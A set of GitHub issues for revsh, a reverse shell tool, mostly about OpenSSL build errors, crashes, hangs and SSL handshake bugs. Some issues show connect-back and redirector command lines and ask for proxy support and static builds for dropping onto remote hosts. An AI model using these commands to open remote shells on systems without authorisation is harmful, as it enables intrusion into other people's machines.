
revsh's Issues

doesn't compile - openssl issues

OS: Ubuntu 18.04 LTS

Makefile (devel)

# you expect someone to move some sort of openssl dependency relative to revsh? 
OPENSSL_DIR = ../openssl  
OPENSSL = $(OPENSSL_DIR)/apps/openssl

OpenSSL 1.1.0 API Changes (was "Failing on Pthread compilation")


Having compilation errors that appear to have a problem with the pthread library. Issue occurs using the top two build options inside the Makefile.

Issue has been seen on multiple Kali boxes, all of which are completely updated.

root@kali:~/Desktop/revsh# uname -a
Linux kali 4.9.0-kali4-amd64 #1 SMP Debian 4.9.25-1kali1 (2017-05-04) x86_64 GNU/Linux

Can get past this error by adding -pthread to the LIBS in the Makefile. After which, I am confronted with this error:

(screenshot: virtualbox_2017-05-10_19-27-38)

Controller and Target Crash while using Socks Proxy

I found a bug where Controller and Target both would crash while downloading a file using Socks Proxy

The crash will happen randomly anytime you're downloading or browsing using the socks proxy, but I found a specific procedure to reproduce this bug:

  • Both Target and Controller are running in keepalive mode
  • On Controller open Firefox and set it to use revsh socks proxy
  • Make sure that "Always ask you where to save files" is selected in Firefox / Preferences / General
  • Now try to browse a local network webserver and download a file that is 20MB+ in size (in my test it was "vlc-2.2.6-win32.exe") and instead of choosing "Save" choose "Cancel"
  • Controller and Target will both crash

Here is the last part of the strace output from the controller:

read(4, "\xbd\x13\x65\x9e\x51\x0e\x36\xcc\xec\x2f\x62\xd5\x5c\x25\xeb\xe6\x8d\xfe\xcc\x50\x10\x02\x31\xe9\xf3\x8f\xe0\x1f\x93\xfa\xaa\x20"..., 4128) = 914
read(4, 0x63a76a, 3214) = -1 EAGAIN (Resource temporarily unavailable)
select(5, [4], NULL, NULL, NULL) = 1 (in [4])
read(4, "\xd2\xb5\xe6\x61\x80\x2f\x27\x1c\x7c\x60\xcc\x4c\x1c\x54\x25\x65\x45\xb2\x90\xdb\xe1\xb0\xd5\xb7\x46\xfa\xcc\xb9\x09\xf7\x30\x7b"..., 3214) = 1420
read(4, 0x63acf6, 1794) = -1 EAGAIN (Resource temporarily unavailable)
select(5, [4], NULL, NULL, NULL) = 1 (in [4])
read(4, "\xeb\x6f\x06\x8d\xc7\xd7\xac\x40\x4a\x2c\xeb\x86\xf5\xe1\x32\x0e\xbb\x41\xa1\x7a\x82\x55\x86\x9d\xa3\xd6\x5c\x6b\x61\x8b\x94\x9c"..., 1794) = 1420
read(4, 0x63b282, 374) = -1 EAGAIN (Resource temporarily unavailable)
select(5, [4], NULL, NULL, NULL) = 1 (in [4])
read(4, "\x1f\x60\xfa\x65\xff\x58\xd6\x69\x95\xac\x27\xf7\xb2\xba\xd8\xd6\xf8\x12\x81\x2e\x2d\xda\xe5\x3c\x52\x03\xe3\x10\xbb\xa6\x21\xd8"..., 374) = 374
write(5, "\xb3\xf2\x26\xf0\xbc\x33\x7c\xa4\x8f\xec\xf6\xab\x53\xea\xd1\x88\x83\xdd\xa6\x0b\xbc\xb3\x85\xd6\x1e\x94\x5a\xcb\xe0\x61\x38\xbb"..., 4096) = -1 EPIPE (Broken pipe)
--- SIGPIPE {si_signo=SIGPIPE, si_code=SI_USER, si_pid=24072, si_uid=0} ---
+++ killed by SIGPIPE +++
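
The `+++ killed by SIGPIPE +++` at the end of the trace is the whole process being terminated because a write hit a peer that had already hung up (the cancelled download). The following is an added C example, not revsh's code, showing the defensive pattern: ignore SIGPIPE so the write returns -1/EPIPE, treat that as a per-channel event, and keep the process alive. `channel_write_all`, `demo_peer_closed` and the CH_* codes are names chosen here, and the socketpair stands in for the proxied connection.

```c
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Result codes for one write on one proxied channel. */
enum { CH_OK = 0, CH_PEER_GONE = 1, CH_FATAL = 2 };

/* SIGPIPE's default action is to terminate the process, which is exactly the
   "+++ killed by SIGPIPE +++" in the trace. Ignoring it turns a write to a
   hung-up peer into an ordinary -1/EPIPE return that the caller can handle. */
void ignore_sigpipe(void)
{
    signal(SIGPIPE, SIG_IGN);
}

/* Write the whole buffer to one channel fd. A peer that closed its end
   (EPIPE or ECONNRESET) is local to that channel: report CH_PEER_GONE so the
   caller tears down just that channel and the tunnel itself stays up. */
int channel_write_all(int fd, const void *buf, size_t len)
{
    const char *p = buf;

    while (len > 0) {
        ssize_t n = write(fd, p, len);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            if (errno == EPIPE || errno == ECONNRESET)
                return CH_PEER_GONE;
            return CH_FATAL;
        }
        p += n;
        len -= (size_t)n;
    }
    return CH_OK;
}

/* Constructed reproduction of the report: the browser cancels the download
   and closes its socket while the controller still has data to forward.
   Returns the channel_write_all() result; the process survives the write. */
int demo_peer_closed(void)
{
    int sv[2];
    char chunk[4096];
    int rc;

    ignore_sigpipe();
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return CH_FATAL;
    close(sv[1]);                       /* peer hangs up (the "Cancel" click) */
    memset(chunk, 'A', sizeof chunk);
    rc = channel_write_all(sv[0], chunk, sizeof chunk);
    close(sv[0]);
    return rc;
}

int main(void)
{
    int rc = demo_peer_closed();
    printf("write after peer closed: %s\n",
           rc == CH_PEER_GONE ? "EPIPE handled, process alive" : "unexpected");
    return rc == CH_PEER_GONE ? 0 : 1;
}
```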

Shell hangs if output buffer is too long

This happens to me quite a lot. When I perform a command which produces a lot of output, such as a long file listing, the shell hangs and I have to initiate a separate connection to kill it. Even CTRL+C or any other combination of keys seems to be able to kill it.
Let me know if you need more details but this is kind of straightforward to test I think.

PS: This is one of the most useful tools I found in the last months :) it's really awesome, I use it a lot on CTFs and pentests.

Weird output on connection + random bytes

  1. This happens when trying to connect from Windows on Linux (CLIENT) to an instance compiled on Ubuntu 16.04.2 LTS (SERVER). The client immediately exits.

https://i.imgur.com/GZt0hE7.png

  2. When trying to listen (SERVER) on Ubuntu 16.04.2 LTS, the application is stuck for a good 2 minutes. Strace shows it's trying to read /dev/random bytes - on my system there was not enough random entropy - so it got stuck for 2-4 min.

Solutions?

Hiding rc from STDIN

I was thinking whether we can hide or silence the output of sending the "rc" file contents to the target instead of making it pop up on STDIN, because I'm finding myself adding lots of shell functions and env variables to automate and script some stuff, but it's a little ugly when you open a session.

config.h doesn't seem to support port numbers with 5 characters

Here is my config.h:
(screenshot: 2017-04-25 at 3 08 21 pm)
However, when I try to launch the controller using the defaults, it appears to drop the last number.
(screenshot: 2017-04-25 at 3 11 22 pm)
A quick double check with nmap confirms that it's not just a printing issue but also a functionality issue.
(screenshot: 2017-04-25 at 3 11 39 pm)
Throwing away the defaults, I specify the arguments manually.
(screenshot: 2017-04-25 at 3 12 00 pm)
Then the port appears open.
(screenshot: 2017-04-25 at 3 12 27 pm)

Assuming it's a parsing issue.
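
The report does not show where the digit is lost. The added C example below is not revsh's code; it assumes one common cause, a port buffer sized for four digits plus the terminator, and shows a strict parser plus a startup consistency check that would fail loudly instead of silently listening on 2200 when 22000 was configured. The function names and the 22000 value are constructed for the example.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Strict port parser: the whole string must be decimal digits and the value
   must lie in 1..65535. Returns the port, or -1 on any defect, so a bad value
   is rejected at startup instead of quietly binding a different port. */
long parse_port_strict(const char *s)
{
    char *end;
    long v;

    if (s == NULL || *s < '0' || *s > '9')      /* empty, sign or space: reject */
        return -1;
    errno = 0;
    v = strtol(s, &end, 10);
    if (errno != 0 || *end != '\0')             /* overflow or trailing junk */
        return -1;
    if (v < 1 || v > 65535)
        return -1;
    return v;
}

/* Constructed illustration (an assumption, not revsh's code): copy the port
   string through a buffer sized for four digits plus the terminator, then
   parse what survived. "2200" survives, "22000" loses its last digit. */
#define SMALL_PORT_BUF 5
long port_after_truncating_copy(const char *src)
{
    char buf[SMALL_PORT_BUF];

    strncpy(buf, src, SMALL_PORT_BUF - 1);
    buf[SMALL_PORT_BUF - 1] = '\0';
    return parse_port_strict(buf);
}

/* Startup check: the configured default string must parse to exactly the
   number the listener is about to bind. Returns 1 if consistent, else 0. */
int default_port_is_consistent(const char *configured, long about_to_bind)
{
    long want = parse_port_strict(configured);
    return want != -1 && want == about_to_bind;
}

int main(void)
{
    const char *configured = "22000";           /* constructed 5-digit default */
    long bound = port_after_truncating_copy(configured);

    printf("configured %s, would bind %ld, consistent: %d\n",
           configured, bound, default_port_is_consistent(configured, bound));
    printf("strict parse of \"2200x\": %ld\n", parse_port_strict("2200x"));
    return 0;
}
```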

Defunct processes in keepalive mode.


From @alzzac:
"Hi, there is a new discover once I exited from the keep-alive connection, the [revsh] process will be added. Is it possible to fix this?"

This sounds like a problem with the child clean up code specific to keepalive. I'll look into this as soon as I get some free time.

Error on linux host without libssl

Please consider, if possible, only loading a library if an argument is used for it.

./revsh: error while loading shared libraries: libssl.so.1.0.0: cannot open shared object file: No such file or directory

OpenSSL 3.0.0-alpha generated C code has different function name declaration than older OpenSSL versions

I was installing this; I compiled OpenSSL and configured it with the advised arguments in the install instructions.

While trying to compile revsh, running make produced:

...
if [ ! -e keys/dh_params.c ]; then \
    ../openssl/apps/openssl dhparam -noout -C 2048 >keys/dh_params.c ; \
	echo "DH *(*get_dh)() = &get_dh2048;" >>keys/dh_params.c ; \
  fi
Generating DH parameters, 2048 bit long safe prime, generator 2
This is going to take a long time
.+........+......+..+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*
..+..+.+..+.........+..+...
...
keys/dh_params.c:75:20: error: 'get_dh2048' undeclared here (not in a function)
 DH *(*get_dh)() = &get_dh2048;

The generated C code in keys/dh_params.c is:

static DH *get_dh256(void)
{
    static unsigned char dhp_256[] = {
        0x96, 0x4E, 0x1B, 0xBE, 0x81, 0x01, 0x67, 0x67, 0x21, 0xFF,
        0x19, 0x63, 0x5C, 0x13, 0x02, 0x3E, 0xC0, 0xE7, 0xCA, 0x1A,
        0xB7, 0x59, 0x61, 0x08, 0x05, 0xE8, 0x0B, 0xF3, 0xB6, 0xD3,
        0x73, 0x3B, 0x26, 0x56, 0xF8, 0xB1, 0xDA, 0x42, 0xEB, 0x78,
        0xE9, 0xE5, 0x85, 0x70, 0x9E, 0x10, 0xA2, 0x80, 0x0D, 0x53,
        0xFF, 0x06, 0x61, 0xE1, 0x2F, 0xB7, 0x80, 0x42, 0x76, 0xE3,
        0x99, 0xAB, 0x32, 0x93, 0x65, 0xF0, 0xA2, 0xC6, 0x9E, 0x0F,
        0x52, 0xD1, 0x27, 0x6B, 0xDF, 0xCC, 0x99, 0x71, 0x65, 0x1E,
        0xBC, 0x89, 0xBC, 0x5D, 0xF4, 0x80, 0x9E, 0xC5, 0x19, 0xB5,
        0xE1, 0x0F, 0xE8, 0xAF, 0xE2, 0x75, 0x15, 0xED, 0xCE, 0x99,
        0xA6, 0xC5, 0xC5, 0xD1, 0xEA, 0xEE, 0x4E, 0xBB, 0x18, 0xAF,
        0xC5, 0x12, 0xE3, 0x93, 0x5D, 0xDC, 0xF7, 0xE2, 0xAB, 0x56,
        0x4A, 0x58, 0x60, 0x7D, 0x31, 0xA9, 0xCD, 0xA5, 0xF1, 0x40,
        0xD0, 0x93, 0xD4, 0x4A, 0x8B, 0x74, 0x43, 0xA3, 0x83, 0x3A,
        0xFA, 0xD7, 0xEE, 0x86, 0x59, 0xA3, 0x6F, 0xDA, 0x5E, 0x4C,
        0x39, 0xDB, 0x0E, 0x75, 0xCC, 0x40, 0xD5, 0xF5, 0x0B, 0x94,
        0xCC, 0xB2, 0xC7, 0x07, 0xEB, 0x1C, 0xEF, 0xFF, 0xD2, 0x9C,
        0x95, 0x5F, 0x48, 0x1D, 0x0B, 0x0E, 0xE5, 0xE1, 0x5F, 0x3E,
        0x01, 0xE8, 0xD6, 0xB6, 0x58, 0x86, 0x38, 0xBA, 0xC9, 0x50,
        0xB2, 0x5C, 0x83, 0xC1, 0xB2, 0x78, 0xAB, 0x07, 0xDD, 0x17,
        0xAC, 0x4D, 0xA6, 0x37, 0x0C, 0x3A, 0xCB, 0xE9, 0xE2, 0x0C,
        0x06, 0xB0, 0xE2, 0x6E, 0x19, 0x90, 0x00, 0xEA, 0xDA, 0x77,
        0xD2, 0xA4, 0xCE, 0x93, 0x7F, 0x13, 0x33, 0x7E, 0xF5, 0x3E,
        0x31, 0xF9, 0x77, 0xAA, 0x39, 0x71, 0xFF, 0xAD, 0x02, 0x41,
        0x62, 0x57, 0xF5, 0xC1, 0x26, 0xAE, 0xA2, 0xC0, 0x29, 0x48,
        0x28, 0xE2, 0x86, 0x4C, 0xB4, 0x0D
    };
    static unsigned char dhg_256[] = {
        0x0E, 0x5B, 0xAB, 0x57, 0x41, 0x6E, 0x82, 0x3C, 0x10, 0x92,
        0x8B, 0x18, 0x0D, 0xD5, 0x66, 0xF7, 0x33, 0x5E, 0x35, 0xAF,
        0xFF, 0x7A, 0x56, 0x87, 0x8A, 0xDA, 0x5D, 0xD4, 0xF4, 0x2E,
        0xB1, 0x77, 0x2F, 0x79, 0xB3, 0x77, 0x95, 0xC5, 0x8E, 0x9C,
        0xB0, 0x2A, 0xCE, 0x3A, 0x0F, 0xF5, 0x55, 0x0F, 0x06, 0x12,
        0x9B, 0xEC, 0x90, 0x42, 0x9B, 0x4B, 0xCA, 0xF5, 0x72, 0x70,
        0x8A, 0xE2, 0xEC, 0x5C, 0x13, 0x1D, 0xB3, 0x03, 0xC2, 0xCE,
        0xF4, 0x08, 0xF2, 0x63, 0x65, 0xF3, 0x53, 0xD6, 0x02, 0xA7,
        0x19, 0x11, 0x2D, 0x6C, 0x5A, 0x82, 0x06, 0xEF, 0xC7, 0x3E,
        0x92, 0x1E, 0xE1, 0x64, 0x71, 0xB4, 0x88, 0x91, 0x5E, 0xD3,
        0xCF, 0x16, 0xB3, 0x3E, 0xB2, 0x8D, 0xB0, 0x61, 0x7F, 0x23,
        0xA3, 0x39, 0x69, 0x3E, 0x9D, 0x44, 0x92, 0x57, 0xED, 0x90,
        0xF1, 0x0C, 0xB2, 0x28, 0xD0, 0x61, 0x4B, 0x2A, 0x70, 0xE7,
        0x82, 0xCC, 0x75, 0x92, 0x1E, 0x65, 0x3A, 0x56, 0x85, 0x0D,
        0x3F, 0x40, 0x59, 0x0A, 0x45, 0xEF, 0x99, 0x03, 0x88, 0x8C,
        0xD5, 0x82, 0xC3, 0xE2, 0x6F, 0x1F, 0x2B, 0xBD, 0x0F, 0x50,
        0xAD, 0xD6, 0x46, 0x26, 0xBD, 0x02, 0x58, 0x41, 0xA9, 0x00,
        0xE5, 0x23, 0x0E, 0x0A, 0xD6, 0x10, 0xEB, 0x9B, 0x81, 0x0B,
        0xB2, 0x53, 0x73, 0x35, 0xF9, 0xBE, 0x5C, 0x86, 0x33, 0xE4,
        0xAA, 0x10, 0x34, 0xA5, 0x0A, 0x63, 0x06, 0x0E, 0xF3, 0x4B,
        0x4C, 0xDB, 0xE4, 0x28, 0xED, 0x1B, 0x4D, 0x43, 0x62, 0x46,
        0xF5, 0xD3, 0x55, 0x67, 0x7D, 0xEC, 0x6A, 0x2F, 0x61, 0x5A,
        0x0F, 0x8C, 0xAA, 0xFA, 0x20, 0xE2, 0x40, 0xD2, 0x1D, 0x39,
        0xE9, 0x08, 0x99, 0xAF, 0x7E, 0x0A, 0x32, 0xBE, 0xA6, 0xC9,
        0xB0, 0x6E, 0x09, 0x94, 0xFB, 0xD7, 0xF8, 0xE4, 0xAC, 0xEB,
        0xFC, 0x1D, 0xD4, 0xB9, 0x0A, 0xF0
    };
    DH *dh = DH_new();
    BIGNUM *p, *g;

    if (dh == NULL)
        return NULL;
    p = BN_bin2bn(dhp_256, sizeof(dhp_256), NULL);
    g = BN_bin2bn(dhg_256, sizeof(dhg_256), NULL);
    if (p == NULL || g == NULL
            || !DH_set0_pqg(dh, p, NULL, g)) {
        DH_free(dh);
        BN_free(p);
        BN_free(g);
        return NULL;
    }
    return dh;
}
DH *(*get_dh)() = &get_dh2048;

If I generate the C code using the OpenSSL binary installed on my system and not the compiled one, the generated function declaration is

$ openssl dhparam -noout -C 2048
#ifndef HEADER_DH_H
#include <openssl/dh.h>
#endif
DH *get_dh2048()
        {
        static unsigned char dh2048_p[]={
                0x86,0xB5,0x48,0xF3,0x63,0xE2,0x92,0x97,0xC1,0x5B,0xEC,0x3A,
                0x40,0xFF,0x3E,0xA9,0x64,0xBC,0x24,0x11,0x3D,0xC0,0x9A,0x57,
                0xCF,0xF5,0x02,0xFA,0x08,0xF5,0x1A,0x50,0x08,0x77,0x2E,0xD9,
                0x20,0x5B,0xB0,0xA7,0xAA,0x32,0xC1,0x54,0xF1,0xF3,0x29,0xBE,
                0x34,0x54,0xD6,0xC1,0x57,0x2F,0x35,0xED,0x7F,0xE4,0xE0,0x46,
                0x82,0x28,0x0D,0xB2,0xB2,0x30,0x7E,0x43,0xCB,0x98,0xBA,0x09,
                0x75,0x72,0xED,0x71,0xD0,0x2D,0xE6,0xAD,0x45,0x2E,0xE8,0x37,
                0x48,0x81,0x1F,0x94,0x3C,0x1C,0x5B,0x22,0x67,0x6E,0xB2,0x96,
                0xBD,0x26,0x75,0x59,0x4E,0xCF,0x2F,0xA0,0x26,0x70,0x4A,0xF6,
                0x8C,0xAF,0x69,0x88,0x2B,0x05,0x59,0x5E,0x60,0xFD,0x4F,0xB7,
                0xBC,0x63,0x96,0x0F,0xC2,0xE1,0x9B,0xF9,0x71,0x1B,0x0F,0x05,
                0x74,0x5D,0xAB,0xF5,0x37,0x65,0x50,0xF0,0x9F,0xF4,0x3F,0xE6,
                0x21,0xB9,0x28,0xAA,0x68,0xC8,0x11,0xC2,0xB6,0x30,0xD3,0x8D,
                0xB8,0x3E,0x6E,0x9D,0x24,0xE0,0xE8,0xDF,0xEE,0x0E,0x4F,0xDD,
                0xC6,0x55,0x7F,0xC3,0x5D,0x48,0xC1,0x20,0x01,0x79,0xCE,0x12,
                0xEA,0x9C,0xAD,0x32,0xC5,0x62,0x01,0xA2,0x40,0x36,0xB9,0x8E,
                0x9B,0x72,0xF4,0xBB,0xA7,0x38,0xEF,0x44,0xC0,0x46,0xAC,0x91,
                0xE4,0xF2,0x5C,0x1A,0xC6,0xF4,0xE3,0x3C,0x36,0x17,0x6F,0x41,
                0x87,0xB7,0x2A,0xB8,0xF8,0xF9,0x5D,0x9C,0x6F,0x09,0x71,0x66,
                0xB1,0xD1,0xF5,0xA7,0x05,0x4F,0xB3,0x93,0x54,0x81,0x36,0x18,
                0x7D,0x93,0x50,0xFB,0x68,0x55,0xAB,0x48,0xE9,0x7B,0x4C,0xAF,
                0x74,0xB6,0xFA,0x03,
                };
        static unsigned char dh2048_g[]={
                0x02,
                };
        DH *dh;

        if ((dh=DH_new()) == NULL) return(NULL);
        dh->p=BN_bin2bn(dh2048_p,sizeof(dh2048_p),NULL);
        dh->g=BN_bin2bn(dh2048_g,sizeof(dh2048_g),NULL);
        if ((dh->p == NULL) || (dh->g == NULL))
                { DH_free(dh); return(NULL); }
        return(dh);
        }

Compiled OpenSSL version:

$ ../openssl/apps/openssl version  
OpenSSL 3.0.0-alpha5-dev  (Library: OpenSSL 3.0.0-alpha5-dev )

Installed OpenSSL version:

$ openssl version
OpenSSL 1.0.2k-fips  26 Jan 2017

Obviously cloning the latest branch commit of OpenSSL can raise compatibility issues with future releases of OpenSSL. I'll be happy to create a PR to modify the INSTALL instructions, or instead maybe we can use sed to get the declared function name instead of hardcoding it.

gcc can't compile revsh

OS: Kali Linux x86_64

I tried compiling with make and it gave me an error:

/usr/bin/cc -Wall -Wextra -std=c99 -pedantic -Os -DOPENSSL -o in_the_key_of_c in_the_key_of_c.c /usr/lib/x86_64-linux-gnu/libssl.a /usr/lib/x86_64-linux-gnu/libcrypto.a -ldl
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_lock_new': (.text+0x25): undefined reference to `pthread_rwlock_init'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_read_lock': (.text+0x55): undefined reference to `pthread_rwlock_rdlock'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_write_lock': (.text+0x75): undefined reference to `pthread_rwlock_wrlock'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_unlock': (.text+0x95): undefined reference to `pthread_rwlock_unlock'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_lock_free': (.text+0xba): undefined reference to `pthread_rwlock_destroy'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_run_once': (.text+0xe5): undefined reference to `pthread_once'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_init_local': (.text+0x105): undefined reference to `pthread_key_create'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_set_local': (.text+0x137): undefined reference to `pthread_setspecific'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_cleanup_local': (.text+0x157): undefined reference to `pthread_key_delete'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_get_local': (.text+0x123): undefined reference to `pthread_getspecific'
collect2: error: ld returned 1 exit status
Makefile:138: recipe for target 'in_the_key_of_c' failed
make: *** [in_the_key_of_c] Error 1

Thanks for your help!

Proxy support in connectback

A useful feature would be to support proxies for making the connection - for example, if the box you want to get a callback from has an outbound SOCKS/HTTP proxy server for outgoing connections.

Unsure how much of a pain in the ass it would be to add, but there is already some SOCKS code in there that could possibly be reused somewhat.

Improper error reporting when binding to domain name that doesn't resolve.

First example:

empty@monkey:~/tmp/revsh$ ./revsh -c -vvv foo.bar.com

Controller: Listening on foo.bar.com:2200.
�Ռ: 6795616: BIO_do_accept(0): (null)
25909320:error:2006A066:BIO routines:BIO_get_host_ip:bad hostname lookup:b_sock.c:146:host=foo.bar.com
do_control(): init_io_control(18b7cc0): Success

Statically compile for dropping onto remote servers?

Hey, so the intended use is to drop /usr/local/bin/revsh onto a host after install, right?

Maybe there should be an extra build step to generate a full static build into a folder. I went into the makefile and set the static build cflags and everything worked fine, but it'd probably be beneficial to usability.

Thanks for the tool though, it's much more convenient than socat.

Compatibility Mode breaks `make install`

In compatibility mode, the KEYS_DIR variable is set to ""
(screenshot: 2017-04-25 at 3 29 26 pm)
Therefore, when the make install is run...

if [ ! -e $(HOME)/.revsh ]; then \
                mkdir $(HOME)/.revsh ; \ #REFERENCE 1
        fi
        if [ -e $(HOME)/.revsh/$(KEYS_DIR) ]; then \ #REFERENCE 2
                echo "\nERROR: $(HOME)/.revsh/$(KEYS_DIR) already exists! Move it safely out of the way then try again, please." ; \ 
        else \

Example:

It will create the /root/.revsh directory at REFERENCE 1

Then it will complain about the /root/.revsh directory at REFERENCE 2 because the KEYS_DIR variable is empty.

This can become very frustrating for the user as they try to rm -rf the directory and it magically reappears. 😈

Keep-alive in bindshell mode breaks after disconnect.

Control:
empty@monkey:~/code/revsh$ ./revsh -c -d keys/ -b 127.0.0.1

Target:
empty@monkey:~/code/revsh$ ./revsh -b -k 127.0.0.1

Upon connect, target throws a memory error:
*** Error in './revsh': double free or corruption (fasttop): 0x00000000028f3770 ***

After exit, target daemonizes, allows second connection, finishes initialization, but hangs upon entering the broker() loop.

SSL_connect

  1. Connecting to TCP redirector (socat) or any another TCP port:
Control:
# socat TCP-LISTEN:2200,fork TCP:192.168.1.3:2200
2018/10/12 12:02:31 socat[17645] E connect(5, AF=2 192.168.1.3:2200, 16): Connection refused
where 192.168.1.3:2200 is a closed port
Target:
# ./revsh -vv 192.168.1.2 -k -r 5,10 -t 0
Connecting to 192.168.1.2:2200...	Connected!
init_io_target(): SSL_connect(8b62f50): Success
do_target(): init_io_connect(8b4f760): Success

  2. If connecting to the revsh server with different keys (control_key.pem target_key.pem target_cert.pem):
Target:
# ./revsh -vv 192.168.1.2 -k -r 5,10 -t 0
Connecting to 192.168.1.2:2200...	Connected!
negotiate_protocol(): io->remote_read(bfc2e1de, 2): Success
do_target(): negotiate_protocol(): Success
Control:
Listening on 0.0.0.0:2200...Listening on 0.0.0.0:2200...Listening on 0.0.0.0:2200...
  3. If revsh on the server side is offline, trying to connect from the client:
# ./revsh -vv 192.168.1.2 -k -r 5,10 -t 0
Connecting to  192.168.1.2:2200...init_io_target(): BIO_do_connect(8540cb8): Connection refused
0:error:0200206F:system library:connect:Connection refused:crypto/bio/b_sock2.c:110:
0:error:2008A067:BIO routines:BIO_connect:connect error:crypto/bio/b_sock2.c:111:
0:error:0200206F:system library:connect:Connection refused:crypto/bio/bss_conn.c:173:hostname=192.168.1.2 service=2200
0:error:20073067:BIO routines:conn_state:connect error:crypto/bio/bss_conn.c:177:
Retrying in 7 seconds...
Connecting to 192.168.1.2:2200...init_io_target(): BIO_do_connect(853eb40): Connection refused
0:error:0200206F:system library:connect:Connection refused:crypto/bio/b_sock2.c:110:
0:error:2008A067:BIO routines:BIO_connect:connect error:crypto/bio/b_sock2.c:111:
0:error:0200206F:system library:connect:Connection refused:crypto/bio/bss_conn.c:173:hostname=192.168.1.2 service=2200
0:error:20073067:BIO routines:conn_state:connect error:crypto/bio/bss_conn.c:177:
Retrying in 5 seconds...
Connecting to 192.168.1.2:2200...init_io_target(): BIO_do_connect(8540c28): Connection refused
0:error:0200206F:system library:connect:Connection refused:crypto/bio/b_sock2.c:110:
0:error:2008A067:BIO routines:BIO_connect:connect error:crypto/bio/b_sock2.c:111:
0:error:0200206F:system library:connect:Connection refused:crypto/bio/bss_conn.c:173:hostname=192.168.1.2 service=2200
0:error:20073067:BIO routines:conn_state:connect error:crypto/bio/bss_conn.c:177:
Retrying in 6 seconds...

revsh info:
default config, no changes in source code
Debian wheezy x86

Controller crashes by hitting port with a browser (connection without client certificate)

I really didn't think that revsh can't handle these errors and would simply crash!

peer did not return a certificate on port 443:
Controller: Listening on 0.0.0.0:443.
Controller: Connected from xxx.xxx.xxx.xxx:64064.
init_io_control(): SSL_accept(633d90): Success
140491016673024:error:1417C0C7:SSL routines:tls_process_client_certificate:peer did not return a certificate:../ssl/statem/statem_srvr.c:2879:
do_control(): init_io_control(614120): Success

unknown ca on random port:
Controller: Listening on 0.0.0.0:4433.
Controller: Connected from xxx.xxx.xxx.xxx:64202.
init_io_control(): SSL_accept(633d70): Success
140704924813056:error:14094418:SSL routines:ssl3_read_bytes:tlsv1 alert unknown ca:../ssl/record/rec_layer_s3.c:1399:SSL alert number 48
do_control(): init_io_control(614120): Success
